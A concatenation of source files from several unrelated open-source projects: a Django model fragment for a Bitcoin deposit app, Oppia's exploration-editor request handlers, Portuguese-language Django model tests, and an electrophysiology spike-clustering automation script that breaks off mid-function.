deposit_address = models.CharField(max_length=64)
spent = models.DecimalField(max_digits=8, decimal_places=8, default=0, editable=False)
hashtwo = models.CharField(max_length=64, editable=False)
class subkey(models.Model):
account_id = models.IntegerField()
subkey_index = models.IntegerField(verbose_name='Subkey Index:', blank=True, null=True)
hash = models.CharField(max_length=64)
hits = models.IntegerField(verbose_name='Hits:', blank=True, null=True)
last_accessed = models.DateTimeField(verbose_name="Last Accessed", null=True)
class transaction(models.Model):
id = models.DateTimeField(verbose_name='Date:', primary_key=True, auto_now=True, editable=False)
account_id = models.IntegerField()
btc_price = models.DecimalField(verbose_name='BTC Price:', max_digits=7, decimal_places=2)
btc_amount = models.DecimalField(verbose_name='BTC Amount:', max_digits=8, decimal_places=8, default=0, editable=False)
class access(models.Model):
id = models.DateTimeField(verbose_name='Date',primary_key=True,auto_now=True, editable=False)
account_id = models.IntegerField(editable=False)
ipaddress = models.GenericIPAddressField(verbose_name='IP Address:', null=True, blank=True)
interface = models.CharField(verbose_name='Interface', max_length=23, null=False, blank=False)
class payment(models.Model):
id = models.DateTimeField(verbose_name='Date',primary_key=True,auto_now=True, editable=False)
account_id = models.IntegerField(editable=False)
signed_tx = models.TextField()
| cryptoproofinfo/webapp | popsite/models.py | Python | apache-2.0 | 1,839 |
# coding: utf-8
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the editor view."""
__author__ = 'sll@google.com (Sean Lip)'
import imghdr
import logging
from core.controllers import base
from core.domain import config_domain
from core.domain import dependency_registry
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import interaction_registry
from core.domain import rights_manager
from core.domain import rte_component_registry
from core.domain import skins_services
from core.domain import stats_services
from core.domain import user_services
from core.domain import value_generators_domain
from core.platform import models
current_user_services = models.Registry.import_current_user_services()
import feconf
import utils
import jinja2
# The frontend template for a new state. It is sent to the frontend when the
# exploration editor page is first loaded, so that new states can be
# added in a way that is completely client-side.
# IMPORTANT: Before adding this state to an existing exploration, the
# state name and the destination of the default rule should first be
# changed to the desired new state name.
NEW_STATE_TEMPLATE = {
'content': [{
'type': 'text',
'value': ''
}],
'interaction': exp_domain.State.NULL_INTERACTION_DICT,
'param_changes': [],
'unresolved_answers': {},
}
def get_value_generators_js():
"""Return a string that concatenates the JS for all value generators."""
all_value_generators = (
value_generators_domain.Registry.get_all_generator_classes())
value_generators_js = ''
for _, generator_cls in all_value_generators.iteritems():
value_generators_js += generator_cls.get_js_template()
return value_generators_js
VALUE_GENERATORS_JS = config_domain.ComputedProperty(
'value_generators_js', {'type': 'unicode'},
'JavaScript code for the value generators', get_value_generators_js)
MODERATOR_REQUEST_FORUM_URL_DEFAULT_VALUE = (
'https://moderator/request/forum/url')
MODERATOR_REQUEST_FORUM_URL = config_domain.ConfigProperty(
'moderator_request_forum_url', {'type': 'unicode'},
'A link to the forum for nominating explorations to be featured '
'in the gallery',
default_value=MODERATOR_REQUEST_FORUM_URL_DEFAULT_VALUE)
def _require_valid_version(version_from_payload, exploration_version):
"""Check that the payload version matches the given exploration version."""
if version_from_payload is None:
raise base.BaseHandler.InvalidInputException(
'Invalid POST request: a version must be specified.')
if version_from_payload != exploration_version:
raise base.BaseHandler.InvalidInputException(
'Trying to update version %s of exploration from version %s, '
'which is too old. Please reload the page and try again.'
% (exploration_version, version_from_payload))
def require_editor(handler):
"""Decorator that checks if the user can edit the given entity."""
def test_editor(self, exploration_id, escaped_state_name=None, **kwargs):
"""Gets the user and exploration id if the user can edit it.
Args:
self: the handler instance
exploration_id: the exploration id
escaped_state_name: the URL-escaped state name, if it exists
**kwargs: any other arguments passed to the handler
Returns:
The relevant handler, if the user is authorized to edit this
exploration.
Raises:
self.PageNotFoundException: if no such exploration or state exists.
self.UnauthorizedUserException: if the user exists but does not
have the right credentials.
"""
if not self.user_id:
self.redirect(current_user_services.create_login_url(
self.request.uri))
return
if self.username in config_domain.BANNED_USERNAMES.value:
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.')
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
except:
raise self.PageNotFoundException
if not rights_manager.Actor(self.user_id).can_edit(exploration_id):
raise self.UnauthorizedUserException(
'You do not have the credentials to edit this exploration.',
self.user_id)
if not escaped_state_name:
return handler(self, exploration_id, **kwargs)
state_name = self.unescape_state_name(escaped_state_name)
if state_name not in exploration.states:
logging.error('Could not find state: %s' % state_name)
logging.error('Available states: %s' % exploration.states.keys())
raise self.PageNotFoundException
return handler(self, exploration_id, state_name, **kwargs)
return test_editor
class EditorHandler(base.BaseHandler):
"""Base class for all handlers for the editor page."""
# The page name to use as a key for generating CSRF tokens.
PAGE_NAME_FOR_CSRF = 'editor'
class ExplorationPage(EditorHandler):
"""The editor page for a single exploration."""
EDITOR_PAGE_DEPENDENCY_IDS = ['codemirror']
def get(self, exploration_id):
"""Handles GET requests."""
exploration = exp_services.get_exploration_by_id(
exploration_id, strict=False)
if (exploration is None or
not rights_manager.Actor(self.user_id).can_view(
exploration_id)):
self.redirect('/')
return
can_edit = (
bool(self.user_id) and
self.username not in config_domain.BANNED_USERNAMES.value and
rights_manager.Actor(self.user_id).can_edit(exploration_id))
value_generators_js = VALUE_GENERATORS_JS.value
interaction_ids = (
interaction_registry.Registry.get_all_interaction_ids())
interaction_dependency_ids = (
interaction_registry.Registry.get_deduplicated_dependency_ids(
interaction_ids))
dependencies_html, additional_angular_modules = (
dependency_registry.Registry.get_deps_html_and_angular_modules(
interaction_dependency_ids + self.EDITOR_PAGE_DEPENDENCY_IDS))
interaction_templates = (
rte_component_registry.Registry.get_html_for_all_components() +
interaction_registry.Registry.get_interaction_html(
interaction_ids))
interaction_validators_html = (
interaction_registry.Registry.get_validators_html(
interaction_ids))
skin_templates = skins_services.Registry.get_skin_templates(
skins_services.Registry.get_all_skin_ids())
self.values.update({
'INTERACTION_SPECS': interaction_registry.Registry.get_all_specs(),
'additional_angular_modules': additional_angular_modules,
'can_delete': rights_manager.Actor(
self.user_id).can_delete(exploration_id),
'can_edit': can_edit,
'can_modify_roles': rights_manager.Actor(
self.user_id).can_modify_roles(exploration_id),
'can_publicize': rights_manager.Actor(
self.user_id).can_publicize(exploration_id),
'can_publish': rights_manager.Actor(self.user_id).can_publish(
exploration_id),
'can_release_ownership': rights_manager.Actor(
self.user_id).can_release_ownership(exploration_id),
'can_unpublicize': rights_manager.Actor(
self.user_id).can_unpublicize(exploration_id),
'can_unpublish': rights_manager.Actor(self.user_id).can_unpublish(
exploration_id),
'dependencies_html': jinja2.utils.Markup(dependencies_html),
'interaction_templates': jinja2.utils.Markup(
interaction_templates),
'interaction_validators_html': jinja2.utils.Markup(
interaction_validators_html),
'moderator_request_forum_url': MODERATOR_REQUEST_FORUM_URL.value,
'nav_mode': feconf.NAV_MODE_CREATE,
'value_generators_js': jinja2.utils.Markup(value_generators_js),
'skin_js_urls': [
skins_services.Registry.get_skin_js_url(skin_id)
for skin_id in skins_services.Registry.get_all_skin_ids()],
'skin_templates': jinja2.utils.Markup(skin_templates),
'title': exploration.title,
'ALL_LANGUAGE_CODES': feconf.ALL_LANGUAGE_CODES,
'ALLOWED_INTERACTION_CATEGORIES': (
feconf.ALLOWED_INTERACTION_CATEGORIES),
# This is needed for the exploration preview.
'CATEGORIES_TO_COLORS': feconf.CATEGORIES_TO_COLORS,
'INVALID_PARAMETER_NAMES': feconf.INVALID_PARAMETER_NAMES,
'NEW_STATE_TEMPLATE': NEW_STATE_TEMPLATE,
'SHOW_SKIN_CHOOSER': feconf.SHOW_SKIN_CHOOSER,
'TAG_REGEX': feconf.TAG_REGEX,
})
self.render_template('editor/exploration_editor.html')
class ExplorationHandler(EditorHandler):
"""Page with editor data for a single exploration."""
PAGE_NAME_FOR_CSRF = 'editor'
def _get_exploration_data(self, exploration_id, version=None):
"""Returns a description of the given exploration."""
try:
exploration = exp_services.get_exploration_by_id(
exploration_id, version=version)
except:
raise self.PageNotFoundException
states = {}
for state_name in exploration.states:
state_dict = exploration.states[state_name].to_dict()
state_dict['unresolved_answers'] = (
stats_services.get_top_unresolved_answers_for_default_rule(
exploration_id, state_name))
states[state_name] = state_dict
editor_dict = {
'category': exploration.category,
'exploration_id': exploration_id,
'init_state_name': exploration.init_state_name,
'language_code': exploration.language_code,
'objective': exploration.objective,
'param_changes': exploration.param_change_dicts,
'param_specs': exploration.param_specs_dict,
'rights': rights_manager.get_exploration_rights(
exploration_id).to_dict(),
'show_state_editor_tutorial_on_load': (
self.user_id and not
self.user_has_started_state_editor_tutorial),
'states': states,
'tags': exploration.tags,
'title': exploration.title,
'version': exploration.version,
}
if feconf.SHOW_SKIN_CHOOSER:
editor_dict['all_skin_ids'] = (
skins_services.Registry.get_all_skin_ids())
editor_dict['default_skin_id'] = exploration.default_skin
return editor_dict
def get(self, exploration_id):
"""Gets the data for the exploration overview page."""
if not rights_manager.Actor(self.user_id).can_view(exploration_id):
raise self.PageNotFoundException
version = self.request.get('v', default_value=None)
self.values.update(
self._get_exploration_data(exploration_id, version=version))
self.render_json(self.values)
@require_editor
def put(self, exploration_id):
"""Updates properties of the given exploration."""
exploration = exp_services.get_exploration_by_id(exploration_id)
version = self.payload.get('version')
_require_valid_version(version, exploration.version)
commit_message = self.payload.get('commit_message')
change_list = self.payload.get('change_list')
try:
exp_services.update_exploration(
self.user_id, exploration_id, change_list, commit_message)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
self.values.update(self._get_exploration_data(exploration_id))
self.render_json(self.values)
@require_editor
def delete(self, exploration_id):
"""Deletes the given exploration."""
role = self.request.get('role')
if not role:
role = None
if role == rights_manager.ROLE_ADMIN:
if not self.is_admin:
logging.error(
'%s tried to delete an exploration, but is not an admin.'
% self.user_id)
raise self.UnauthorizedUserException(
'User %s does not have permissions to delete exploration '
'%s' % (self.user_id, exploration_id))
elif role == rights_manager.ROLE_MODERATOR:
if not self.is_moderator:
logging.error(
'%s tried to delete an exploration, but is not a '
'moderator.' % self.user_id)
raise self.UnauthorizedUserException(
'User %s does not have permissions to delete exploration '
'%s' % (self.user_id, exploration_id))
elif role is not None:
raise self.InvalidInputException('Invalid role: %s' % role)
logging.info(
'%s %s tried to delete exploration %s' %
(role, self.user_id, exploration_id))
exploration = exp_services.get_exploration_by_id(exploration_id)
can_delete = rights_manager.Actor(self.user_id).can_delete(
exploration.id)
if not can_delete:
raise self.UnauthorizedUserException(
'User %s does not have permissions to delete exploration %s' %
(self.user_id, exploration_id))
is_exploration_cloned = rights_manager.is_exploration_cloned(
exploration_id)
exp_services.delete_exploration(
self.user_id, exploration_id, force_deletion=is_exploration_cloned)
logging.info(
'%s %s deleted exploration %s' %
(role, self.user_id, exploration_id))
class ExplorationRightsHandler(EditorHandler):
"""Handles management of exploration editing rights."""
PAGE_NAME_FOR_CSRF = 'editor'
@require_editor
def put(self, exploration_id):
"""Updates the editing rights for the given exploration."""
exploration = exp_services.get_exploration_by_id(exploration_id)
version = self.payload.get('version')
_require_valid_version(version, exploration.version)
is_public = self.payload.get('is_public')
is_publicized = self.payload.get('is_publicized')
is_community_owned = self.payload.get('is_community_owned')
new_member_username = self.payload.get('new_member_username')
new_member_role = self.payload.get('new_member_role')
viewable_if_private = self.payload.get('viewable_if_private')
if new_member_username:
if not rights_manager.Actor(self.user_id).can_modify_roles(
exploration_id):
raise self.UnauthorizedUserException(
'Only an owner of this exploration can add or change '
'roles.')
new_member_id = user_services.get_user_id_from_username(
new_member_username)
if new_member_id is None:
raise Exception(
'Sorry, we could not find the specified user.')
rights_manager.assign_role(
self.user_id, exploration_id, new_member_id, new_member_role)
elif is_public is not None:
exploration = exp_services.get_exploration_by_id(exploration_id)
if is_public:
try:
exploration.validate(strict=True)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
rights_manager.publish_exploration(
self.user_id, exploration_id)
exp_services.index_explorations_given_ids([exploration_id])
else:
rights_manager.unpublish_exploration(
self.user_id, exploration_id)
exp_services.delete_documents_from_search_index([
exploration_id])
elif is_publicized is not None:
exploration = exp_services.get_exploration_by_id(exploration_id)
if is_publicized:
try:
exploration.validate(strict=True)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
rights_manager.publicize_exploration(
self.user_id, exploration_id)
else:
rights_manager.unpublicize_exploration(
self.user_id, exploration_id)
elif is_community_owned:
exploration = exp_services.get_exploration_by_id(exploration_id)
try:
exploration.validate(strict=True)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
rights_manager.release_ownership(self.user_id, exploration_id)
elif viewable_if_private is not None:
rights_manager.set_private_viewability(
self.user_id, exploration_id, viewable_if_private)
else:
raise self.InvalidInputException(
'No change was made to this exploration.')
self.render_json({
'rights': rights_manager.get_exploration_rights(
exploration_id).to_dict()
})
class ResolvedAnswersHandler(EditorHandler):
"""Allows learners' answers for a state to be marked as resolved."""
PAGE_NAME_FOR_CSRF = 'editor'
@require_editor
def put(self, exploration_id, state_name):
"""Marks learners' answers as resolved."""
resolved_answers = self.payload.get('resolved_answers')
if not isinstance(resolved_answers, list):
raise self.InvalidInputException(
'Expected a list of resolved answers; received %s.' %
resolved_answers)
if 'resolved_answers' in self.payload:
event_services.DefaultRuleAnswerResolutionEventHandler.record(
exploration_id, state_name, 'submit', resolved_answers)
self.render_json({})
class ExplorationDownloadHandler(EditorHandler):
"""Downloads an exploration as a zip file, or dict of YAML strings
representing states."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
except:
raise self.PageNotFoundException
version = self.request.get('v', default_value=exploration.version)
output_format = self.request.get('output_format', default_value='zip')
width = int(self.request.get('width', default_value=80))
# If the title of the exploration has changed, we use the new title
filename = 'oppia-%s-v%s' % (
utils.to_ascii(exploration.title.replace(' ', '')), version)
if output_format == feconf.OUTPUT_FORMAT_ZIP:
self.response.headers['Content-Type'] = 'text/plain'
self.response.headers['Content-Disposition'] = (
'attachment; filename=%s.zip' % str(filename))
self.response.write(
exp_services.export_to_zip_file(exploration_id, version))
elif output_format == feconf.OUTPUT_FORMAT_JSON:
self.render_json(exp_services.export_states_to_yaml(
exploration_id, version=version, width=width))
else:
raise self.InvalidInputException(
'Unrecognized output format %s' % output_format)
class StateDownloadHandler(EditorHandler):
"""Downloads a state as a YAML string."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
except:
raise self.PageNotFoundException
version = self.request.get('v', default_value=exploration.version)
width = int(self.request.get('width', default_value=80))
try:
state = self.request.get('state')
except:
raise self.InvalidInputException('State not found')
exploration_dict = exp_services.export_states_to_yaml(
exploration_id, version=version, width=width)
if state not in exploration_dict:
raise self.PageNotFoundException
self.response.write(exploration_dict[state])
class ExplorationResourcesHandler(EditorHandler):
"""Manages assets associated with an exploration."""
@require_editor
def get(self, exploration_id):
"""Handles GET requests."""
fs = fs_domain.AbstractFileSystem(
fs_domain.ExplorationFileSystem(exploration_id))
dir_list = fs.listdir('')
self.render_json({'filepaths': dir_list})
class ExplorationSnapshotsHandler(EditorHandler):
"""Returns the exploration snapshot history."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
snapshots = exp_services.get_exploration_snapshots_metadata(
exploration_id)
except:
raise self.PageNotFoundException
# Patch `snapshots` to use the editor's display name.
for snapshot in snapshots:
if snapshot['committer_id'] != feconf.ADMIN_COMMITTER_ID:
snapshot['committer_id'] = user_services.get_username(
snapshot['committer_id'])
self.render_json({
'snapshots': snapshots,
})
class ExplorationRevertHandler(EditorHandler):
"""Reverts an exploration to an older version."""
@require_editor
def post(self, exploration_id):
"""Handles POST requests."""
current_version = self.payload.get('current_version')
revert_to_version = self.payload.get('revert_to_version')
if not isinstance(revert_to_version, int):
raise self.InvalidInputException(
'Expected an integer version to revert to; received %s.' %
revert_to_version)
if not isinstance(current_version, int):
raise self.InvalidInputException(
'Expected an integer current version; received %s.' %
current_version)
if revert_to_version < 1 or revert_to_version >= current_version:
raise self.InvalidInputException(
'Cannot revert to version %s from version %s.' %
(revert_to_version, current_version))
exp_services.revert_exploration(
self.user_id, exploration_id, current_version, revert_to_version)
self.render_json({})
class ExplorationStatisticsHandler(EditorHandler):
"""Returns statistics for an exploration."""
def get(self, exploration_id, exploration_version):
"""Handles GET requests."""
try:
exp_services.get_exploration_by_id(exploration_id)
except:
raise self.PageNotFoundException
self.render_json(stats_services.get_exploration_stats(
exploration_id, exploration_version))
class ExplorationStatsVersionsHandler(EditorHandler):
"""Returns statistics versions for an exploration."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
exp_services.get_exploration_by_id(exploration_id)
except:
raise self.PageNotFoundException
self.render_json({
'versions': stats_services.get_versions_for_exploration_stats(
exploration_id)})
class StateRulesStatsHandler(EditorHandler):
"""Returns detailed learner answer statistics for a state."""
def get(self, exploration_id, escaped_state_name):
"""Handles GET requests."""
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
except:
raise self.PageNotFoundException
state_name = self.unescape_state_name(escaped_state_name)
if state_name not in exploration.states:
logging.error('Could not find state: %s' % state_name)
logging.error('Available states: %s' % exploration.states.keys())
raise self.PageNotFoundException
self.render_json({
'rules_stats': stats_services.get_state_rules_stats(
exploration_id, state_name)
})
class ImageUploadHandler(EditorHandler):
"""Handles image uploads."""
@require_editor
def post(self, exploration_id):
"""Saves an image uploaded by a content creator."""
raw = self.request.get('image')
filename = self.payload.get('filename')
if not raw:
raise self.InvalidInputException('No image supplied')
file_format = imghdr.what(None, h=raw)
if file_format not in feconf.ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS:
allowed_formats = ', '.join(
feconf.ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS.keys())
raise Exception('Image file not recognized: it should be in '
'one of the following formats: %s.' %
allowed_formats)
if not filename:
raise self.InvalidInputException('No filename supplied')
if '/' in filename or '..' in filename:
raise self.InvalidInputException(
'Filenames should not include slashes (/) or consecutive dot '
'characters.')
if '.' in filename:
dot_index = filename.rfind('.')
primary_name = filename[:dot_index]
extension = filename[dot_index + 1:].lower()
if (extension not in
feconf.ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS[file_format]):
raise self.InvalidInputException(
'Expected a filename ending in .%s; received %s' %
(file_format, filename))
else:
primary_name = filename
filepath = '%s.%s' % (primary_name, file_format)
fs = fs_domain.AbstractFileSystem(
fs_domain.ExplorationFileSystem(exploration_id))
if fs.isfile(filepath):
raise self.InvalidInputException(
'A file with the name %s already exists. Please choose a '
'different name.' % filepath)
fs.commit(self.user_id, filepath, raw)
self.render_json({'filepath': filepath})
class ChangeListSummaryHandler(EditorHandler):
"""Returns a summary of a changelist applied to a given exploration."""
@require_editor
def post(self, exploration_id):
"""Handles POST requests."""
change_list = self.payload.get('change_list')
version = self.payload.get('version')
current_exploration = exp_services.get_exploration_by_id(
exploration_id)
if version != current_exploration.version:
# TODO(sll): Improve this.
self.render_json({
'error': (
'Sorry! Someone else has edited and committed changes to '
'this exploration while you were editing it. We suggest '
'opening another browser tab -- which will load the new '
'version of the exploration -- then transferring your '
'changes there. We will try to make this easier in the '
'future -- we have not done it yet because figuring out '
'how to merge different people\'s changes is hard. '
'(Trying to edit version %s, but the current version is '
'%s.).' % (version, current_exploration.version)
)
})
else:
utils.recursively_remove_key(change_list, '$$hashKey')
summary = exp_services.get_summary_of_change_list(
current_exploration, change_list)
updated_exploration = exp_services.apply_change_list(
exploration_id, change_list)
warning_message = ''
try:
updated_exploration.validate(strict=True)
except utils.ValidationError as e:
warning_message = unicode(e)
self.render_json({
'summary': summary,
'warning_message': warning_message
})
class StartedTutorialEventHandler(EditorHandler):
"""Records that this user has started the state editor tutorial."""
def post(self, exploration_id):
"""Handles GET requests."""
user_services.record_user_started_state_editor_tutorial(self.user_id)
| infinyte/oppia | core/controllers/editor.py | Python | apache-2.0 | 29,703 |
# -*- coding: utf-8 -*-
# Copyright 2013 Dev in Cachu authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import unittest
from django.db import models as django_models
from .. import models
class ModelPalestranteTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.field_names = models.Palestrante._meta.get_all_field_names()
def test_model_palestrante_deve_ter_nome(self):
self.assertIn("nome", self.field_names)
def test_campo_nome_deve_ser_CharField(self):
field = models.Palestrante._meta.get_field_by_name("nome")[0]
self.assertIsInstance(field, django_models.CharField)
def test_campo_nome_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("nome")[0]
self.assertFalse(field.blank)
def test_campo_nome_deve_ter_no_maximo_100_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("nome")[0]
self.assertEqual(100, field.max_length)
def test_model_palestrante_deve_ter_slug(self):
self.assertIn("slug", self.field_names)
def test_campo_slug_deve_ser_SlugField(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertIsInstance(field, django_models.SlugField)
def test_campo_slug_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertFalse(field.blank)
def test_campo_slug_deve_ter_no_maximo_100_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertEqual(100, field.max_length)
def test_campo_slug_deve_ser_unico(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertTrue(field.unique)
def test_model_palestrante_deve_ter_campo_para_perfil_no_twitter(self):
self.assertIn("twitter", self.field_names)
def test_campo_twitter_deve_ser_CharField(self):
field = models.Palestrante._meta.get_field_by_name("twitter")[0]
self.assertIsInstance(field, django_models.CharField)
def test_campo_twitter_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("twitter")[0]
self.assertIsInstance(field, django_models.CharField)
self.assertTrue(field.blank)
def test_campo_twitter_deve_ter_no_maximo_50_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("twitter")[0]
self.assertEqual(50, field.max_length)
def test_model_palestrante_deve_ter_campo_para_minicurriculo(self):
self.assertIn("minicurriculo", self.field_names)
def test_campo_minicurriculo_deve_ser_CharField(self):
field = models.Palestrante._meta.get_field_by_name("minicurriculo")[0]
self.assertIsInstance(field, django_models.CharField)
def test_campo_minicurriculo_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("minicurriculo")[0]
self.assertFalse(field.blank)
def test_campo_minicurriculo_deve_ter_no_maximo_1000_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("minicurriculo")[0]
self.assertEqual(1000, field.max_length)
def test_palestrante_deve_ter_foto(self):
self.assertIn("foto", self.field_names)
def test_campo_foto_deve_ser_do_tipo_ImageField(self):
field = models.Palestrante._meta.get_field_by_name("foto")[0]
self.assertIsInstance(field, django_models.ImageField)
def test_campo_foto_deve_enviar_fotos_para_diretorio_palestrantes(self):
field = models.Palestrante._meta.get_field_by_name("foto")[0]
self.assertEqual("palestrantes", field.upload_to)
def test_campo_foto_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("foto")[0]
self.assertFalse(field.blank)
def test_palestrante_deve_ter_flag_de_listagem_na_pagina(self):
self.assertIn("listagem", self.field_names)
def test_flag_de_listagem_deve_ser_do_tipo_boolean(self):
field = models.Palestrante._meta.get_field_by_name("listagem")[0]
self.assertIsInstance(field, django_models.BooleanField)
def test_flag_de_listagem_deve_ter_verbose_name_bonitinho(self):
field = models.Palestrante._meta.get_field_by_name("listagem")[0]
self.assertEqual(u"Exibir na página de palestrantes?",
field.verbose_name)
def test_flag_de_listagem_deve_vir_desmarcado_por_padrao(self):
field = models.Palestrante._meta.get_field_by_name("listagem")[0]
self.assertEqual(False, field.default)
def test_repr_deve_conter_nome_do_palestrante(self):
esperado = "<Palestrante: \"Francisco Souza\">"
palestrante = models.Palestrante(nome="Francisco Souza")
self.assertEqual(esperado, repr(palestrante))
def test_unicode_deve_retornar_nome_do_palestrante(self):
palestrante = models.Palestrante(nome="Francisco Souza")
self.assertEqual("Francisco Souza", unicode(palestrante))
def test_str_deve_retornar_nome_do_palestrante(self):
palestrante = models.Palestrante(nome="Francisco Souza")
self.assertEqual("Francisco Souza", str(palestrante))
def test_deve_ter_campo_headline(self):
self.assertIn("headline", self.field_names)
def test_headline_deve_ser_do_tipo_CharField(self):
field = models.Palestrante._meta.get_field_by_name("headline")[0]
self.assertIsInstance(field, django_models.CharField)
def test_headline_deve_ser_obrigatorio(self):
field = models.Palestrante._meta.get_field_by_name("headline")[0]
self.assertFalse(field.blank)
self.assertFalse(field.null)
def test_deadline_deve_ter_no_maximo_60_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("headline")[0]
self.assertEqual(60, field.max_length)
| devincachu/devincachu-2014 | devincachu/palestras/tests/test_model_palestrante.py | Python | bsd-2-clause | 6,017 |
#!/home/david/miniconda/envs/klusta/bin/python
import psutil
import time
import subprocess
import os
import glob
import fnmatch
import socket
import shutil
import argparse
import xml.etree.ElementTree as ET
# import resample
# TODO
# - add behavior tracking extraction
# - add LFP extraction
ssdDirectory = '/home/david/to_cut/autoclustered/'
ssdCompName = 'hyperion'
def main(args):
dataFolder = args.dataFolder # directory with recording subdirectories
numShanks = args.numShanks# set this value to the number of shanks (spike groups) to cluster
waitTime = args.waitTime # time interval, in seconds, in between starting new extraction/clustering jobs
numJobs = args.numJobs# max number of jobs to run at once
cpuLimit = args.cpuLimit # max cpu usage allowed before starting new jobs
repoPath = args.repoPath
print('repo path is : ' + repoPath)
while True: # this is the song that never ends....
os.chdir(dataFolder)
print('searching for unprocessed recordings...')
for dirName, subdirList, fileList in os.walk(dataFolder):
for file in fileList:
# check that a .dat exists in this folder and matches the
# directory name
if file.startswith(dirName.split('/')[-1]) & file.endswith(".dat"):
os.chdir(os.path.abspath(dirName)) # we are now in the recording session folder...
xmlfile = glob.glob("*xml")
extractLFP(dirName,file,xmlfile,repoPath) # if no LFP yet, we make one
# check if shank dirs exist and make them if they don't
checkShankDirsExist(subdirList, dirName, numShanks, xmlfile,repoPath)
for root, shankdirs, defaultFiles in os.walk(dirName):
for shank in shankdirs: # iterate through shank subdirectories
# if the shank hasn't already been clustered and its directory name is less than 3 characters
if not fnmatch.fnmatch(shank, '_klust*') and len(shank) < 3:
os.chdir(shank) # now in shank directory
for file in os.listdir('.'):
# double check there's a prm file
if fnmatch.fnmatch(file, '*.prm'):
# you shall not pass... until other
# jobs have finished.
checkJobLimits(cpuLimit, numJobs, waitTime)
# check that spike extraction hasn't
# been done
if not any(fnmatch.fnmatch(i, '*.kwik') for i in os.listdir('.')):
# startClusterJob(root, file)
print('do nothing')
# check if there is a log file
status = getFolderStatus()
startAutoClustering(shank, dirName,repoPath,status)
copyToSSD(
ssdCompName, ssdDirectory, root, shank, status)
os.chdir('..') # return to recording directory
time.sleep(waitTime) # it goes on and on my friends...
def getCurrentJobs():
detekt = "phy"
kk = "klustakwik"
klusta = "klusta"
KK = "Klustakwik" # upper case version on the servers
matlab = "MATLAB"
count = 0
for proc in psutil.process_iter():
if proc.name() == kk:
count += 1
if proc.name() == detekt:
count += 1
if proc.name() == klusta:
count += 1
if proc.name() == KK:
count += 1
if proc.name() == matlab:
count += 1
return count
def getFolderStatus():
klg = glob.glob('*.klg.*')
print(klg)
if len(klg) > 0:
with open(klg[0], "rb") as f:
if os.path.getsize(klg[0]) > 200: # checks that file has more than 1 byte written to it
f.seek(-2, 2) # Jump to the second last byte.
while f.read(1) != "\n": # Until EOL is found...
# ...jump back the read byte plus one more.
f.seek(-2, 1)
last = f.readline() # Read last line.
status = last.split(" ")[-1].split(".")[0]
status = status.split("\n")[0] # removes EOF
else:
status = ''
else:
status = ''
return status
def checkJobLimits(cpuLimit, numJobs, waitTime):
cpu = psutil.cpu_percent(2)
while cpu > cpuLimit:
print('current cpu usage: %f' % cpu)
# wait until resources are available
time.sleep(waitTime)
cpu = psutil.cpu_percent(2)
mem = psutil.virtual_memory() # samples virtual memory usage
while mem.percent > 97:
print('current memory usage: %f' % mem.percent)
# wait until resources are
# available
time.sleep(waitTime)
mem = psutil.virtual_memory()
while getCurrentJobs() >= numJobs:
print('waiting for %f jobs to finish...' % getCurrentJobs())
time.sleep(waitTime)
def checkShankDirsExist(subdirList, dirName, numShanks, xmlfile,repoPath):
try:
subdirList = [d for d in subdirList if not '201' in d if not
'extras' in d if not 'temp' in d if not 'Session'
in d if not 'State' in d] # removes folders that are not shank folders
if len(subdirList) < numShanks:
# this section needs to be abtracted to the number of
# shanks instead of a hard number...
print(os.path.abspath(dirName))
matlab_command = ['matlab -nodesktop -r "addpath(genpath(\'' + repoPath + '\')); \
addpath(genpath(\'/ifs/home/dwt244/buzcode\')); \
makeProbeMap(\'' + os.path.abspath(dirName) + '\',\'' + xmlfile[0] + '\');exit"']
# generate folder structure and .prm/.prb files
print(matlab_command)
subprocess.call(matlab_command[0], shell=True)
time.sleep(10) # let the process get going...
return True
except:
print('errorrr')
return False
def extractBehaviorTracking(xmlfile):
# checks if there is behavioral tracking data that needs to be synced to ephys data
# eventually this will call Process_ConvertOptitrack2Behav.m or it's
# replacement
if not os.path.isfile([xmlfile[0] + '.tracking.behavior.mat']) and \
len(glob.iglob('Session*')) > 0 or len(glob.iglob('*.tak')) > 0:
matlab_command = ['matlab -nodesktop -r "addpath(genpath(\'' + repoPath + '\')); \
Process_ConvertOptitrack2Behav(' + xmlfile[0] +');exit"']
print(matlab_command)
subprocess.call(matlab_command[0], shell=True)
